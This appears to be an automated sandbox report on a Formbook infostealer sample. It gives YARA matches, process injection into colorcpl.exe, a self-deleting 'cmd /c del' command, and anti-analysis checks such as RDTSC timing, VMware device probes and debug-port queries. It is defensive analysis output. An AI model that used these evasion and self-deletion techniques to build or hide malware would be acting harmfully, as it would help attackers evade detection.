          Source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@11/6
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042C1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_73794225 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,0_2_73794225
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_01
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeFile created: C:\Users\user\AppData\Local\Temp\nso7CE8.tmpJump to behavior
          Source: Nz7NA3F7z7.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeFile read: C:\Users\user\Desktop\Nz7NA3F7z7.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Nz7NA3F7z7.exe 'C:\Users\user\Desktop\Nz7NA3F7z7.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Nz7NA3F7z7.exe 'C:\Users\user\Desktop\Nz7NA3F7z7.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Nz7NA3F7z7.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeProcess created: C:\Users\user\Desktop\Nz7NA3F7z7.exe 'C:\Users\user\Desktop\Nz7NA3F7z7.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Nz7NA3F7z7.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: colorcpl.pdbGCTL source: Nz7NA3F7z7.exe, 00000001.00000002.275552180.0000000000670000.00000040.00000001.sdmp
          Source: Binary string: colorcpl.pdb source: Nz7NA3F7z7.exe, 00000001.00000002.275552180.0000000000670000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Nz7NA3F7z7.exe, 00000000.00000003.217088763.0000000002980000.00000004.00000001.sdmp, Nz7NA3F7z7.exe, 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, colorcpl.exe, 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Nz7NA3F7z7.exe, colorcpl.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeUnpacked PE file: 1.2.Nz7NA3F7z7.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: Nz7NA3F7z7.exeStatic PE information: real checksum: 0x0 should be: 0x3b1c6
          Source: eeysn2cunceh9.dll.0.drStatic PE information: real checksum: 0xc0c7 should be: 0x2c828
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_004160D8 push ebp; ret 1_2_004160E6
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_0041C96C push cs; ret 1_2_0041C96D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_0041B3B5 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_0041B46C push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_0041B402 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_0041B40B push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_0041C40D push esi; iretd 1_2_0041C40F
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_0041C485 push FFFFFFC3h; retf 1_2_0041C48D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00415CA3 push edx; retf 1_2_00415CB3
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_0041CFC1 pushfd ; retf 1_2_0041CFC8
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_004187D8 push ss; ret 1_2_004187DB
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B8D0D1 push ecx; ret 1_2_00B8D0E4
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_1_004160D8 push ebp; ret 1_1_004160E6
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_1_0041C96C push cs; ret 1_1_0041C96D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F6D0D1 push ecx; ret 7_2_04F6D0E4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DA60D8 push ebp; ret 7_2_00DA60E6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DAC96C push cs; ret 7_2_00DAC96D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DAB3B5 push eax; ret 7_2_00DAB408
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DABC84 push 00000056h; retf 7_2_00DABC86
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DAC485 push FFFFFFC3h; retf 7_2_00DAC48D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DA5CA3 push edx; retf 7_2_00DA5CB3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DAB46C push eax; ret 7_2_00DAB472
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DAB40B push eax; ret 7_2_00DAB472
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DAC40D push esi; iretd 7_2_00DAC40F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DAB402 push eax; ret 7_2_00DAB408
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DABD57 push 00000062h; iretd 7_2_00DABD59
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DA87D8 push ss; ret 7_2_00DA87DB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DACFC1 pushfd ; retf 7_2_00DACFC8
          Source: initial sampleStatic PE information: section name: .data entropy: 7.27080116668
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeFile created: C:\Users\user\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dllJump to dropped file
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000000D985E4 second address: 0000000000D985EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000000D9897E second address: 0000000000D98984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Windows\explorer.exe TID: 5128Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: explorer.exe, 00000003.00000000.240265075.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.240265075.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000000.233194998.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: c6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&A
          Source: explorer.exe, 00000003.00000000.239534327.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.240044494.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.495896761.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&A
          Source: explorer.exe, 00000003.00000002.496492907.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.240265075.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.240265075.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.240405437.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.235243867.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.239534327.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.239534327.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.239534327.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00409B20 LdrLoadDll,1_2_00409B20
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_737948E9 mov eax, dword ptr fs:[00000030h]0_2_737948E9
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_737946E6 mov eax, dword ptr fs:[00000030h]0_2_737946E6
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6F0BF mov ecx, dword ptr fs:[00000030h]1_2_00B6F0BF
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6F0BF mov eax, dword ptr fs:[00000030h]1_2_00B6F0BF
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6F0BF mov eax, dword ptr fs:[00000030h]1_2_00B6F0BF
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]1_2_00B620A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]1_2_00B620A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]1_2_00B620A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]1_2_00B620A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]1_2_00B620A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h]1_2_00B620A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B790AF mov eax, dword ptr fs:[00000030h]1_2_00B790AF
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B39080 mov eax, dword ptr fs:[00000030h]1_2_00B39080
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB3884 mov eax, dword ptr fs:[00000030h]1_2_00BB3884
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB3884 mov eax, dword ptr fs:[00000030h]1_2_00BB3884
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B340E1 mov eax, dword ptr fs:[00000030h]1_2_00B340E1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B340E1 mov eax, dword ptr fs:[00000030h]1_2_00B340E1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B340E1 mov eax, dword ptr fs:[00000030h]1_2_00B340E1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B358EC mov eax, dword ptr fs:[00000030h]1_2_00B358EC
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]1_2_00BCB8D0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BCB8D0 mov ecx, dword ptr fs:[00000030h]1_2_00BCB8D0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]1_2_00BCB8D0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]1_2_00BCB8D0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]1_2_00BCB8D0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h]1_2_00BCB8D0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h]1_2_00B6002D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h]1_2_00B6002D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h]1_2_00B6002D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h]1_2_00B6002D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h]1_2_00B6002D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4B02A mov eax, dword ptr fs:[00000030h]1_2_00B4B02A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4B02A mov eax, dword ptr fs:[00000030h]1_2_00B4B02A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4B02A mov eax, dword ptr fs:[00000030h]1_2_00B4B02A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4B02A mov eax, dword ptr fs:[00000030h]1_2_00B4B02A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB7016 mov eax, dword ptr fs:[00000030h]1_2_00BB7016
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB7016 mov eax, dword ptr fs:[00000030h]1_2_00BB7016
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB7016 mov eax, dword ptr fs:[00000030h]1_2_00BB7016
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C01074 mov eax, dword ptr fs:[00000030h]1_2_00C01074
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF2073 mov eax, dword ptr fs:[00000030h]1_2_00BF2073
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C04015 mov eax, dword ptr fs:[00000030h]1_2_00C04015
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C04015 mov eax, dword ptr fs:[00000030h]1_2_00C04015
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B50050 mov eax, dword ptr fs:[00000030h]1_2_00B50050
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B50050 mov eax, dword ptr fs:[00000030h]1_2_00B50050
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB51BE mov eax, dword ptr fs:[00000030h]1_2_00BB51BE
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB51BE mov eax, dword ptr fs:[00000030h]1_2_00BB51BE
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB51BE mov eax, dword ptr fs:[00000030h]1_2_00BB51BE
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB51BE mov eax, dword ptr fs:[00000030h]1_2_00BB51BE
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B661A0 mov eax, dword ptr fs:[00000030h]1_2_00B661A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B661A0 mov eax, dword ptr fs:[00000030h]1_2_00B661A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BB69A6 mov eax, dword ptr fs:[00000030h]1_2_00BB69A6
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B62990 mov eax, dword ptr fs:[00000030h]1_2_00B62990
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6A185 mov eax, dword ptr fs:[00000030h]1_2_00B6A185
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B5C182 mov eax, dword ptr fs:[00000030h]1_2_00B5C182
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]1_2_00B3B1E1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]1_2_00B3B1E1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3B1E1 mov eax, dword ptr fs:[00000030h]1_2_00B3B1E1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BC41E8 mov eax, dword ptr fs:[00000030h]1_2_00BC41E8
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6513A mov eax, dword ptr fs:[00000030h]1_2_00B6513A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6513A mov eax, dword ptr fs:[00000030h]1_2_00B6513A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B54120 mov eax, dword ptr fs:[00000030h]1_2_00B54120
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B54120 mov eax, dword ptr fs:[00000030h]1_2_00B54120
